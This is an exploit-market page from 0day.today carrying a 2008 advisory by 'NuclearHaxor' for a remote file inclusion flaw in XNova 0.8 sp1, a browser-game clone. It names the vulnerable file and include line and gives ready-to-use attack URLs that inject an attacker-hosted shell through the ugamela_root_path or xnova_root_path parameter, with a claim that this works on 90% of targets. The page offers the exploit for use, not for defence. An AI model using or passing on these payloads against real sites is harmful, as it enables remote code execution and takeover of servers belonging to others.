[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XNova 0.8 sp1 (xnova_root_path) Remote File Inclusion Vulnerability

Author
NuclearHaxor
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3532
Category
web applications
Date add
16-08-2008
Platform
unsorted
===================================================================
XNova 0.8 sp1 (xnova_root_path) Remote File Inclusion Vulnerability
===================================================================



##################################################################################################################################
Name: Xnova(Ogame) Remote File Inclusion
Author : NuclearHaxor

homepage of xnova: http://xnova.fr/

Vuln file: includes/todofleetcontrol.php
Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)

Exploit(this exploit works in 90% targets):

------
target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
or new version of xnova:
target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
------



#  0day.today [2024-11-16]  #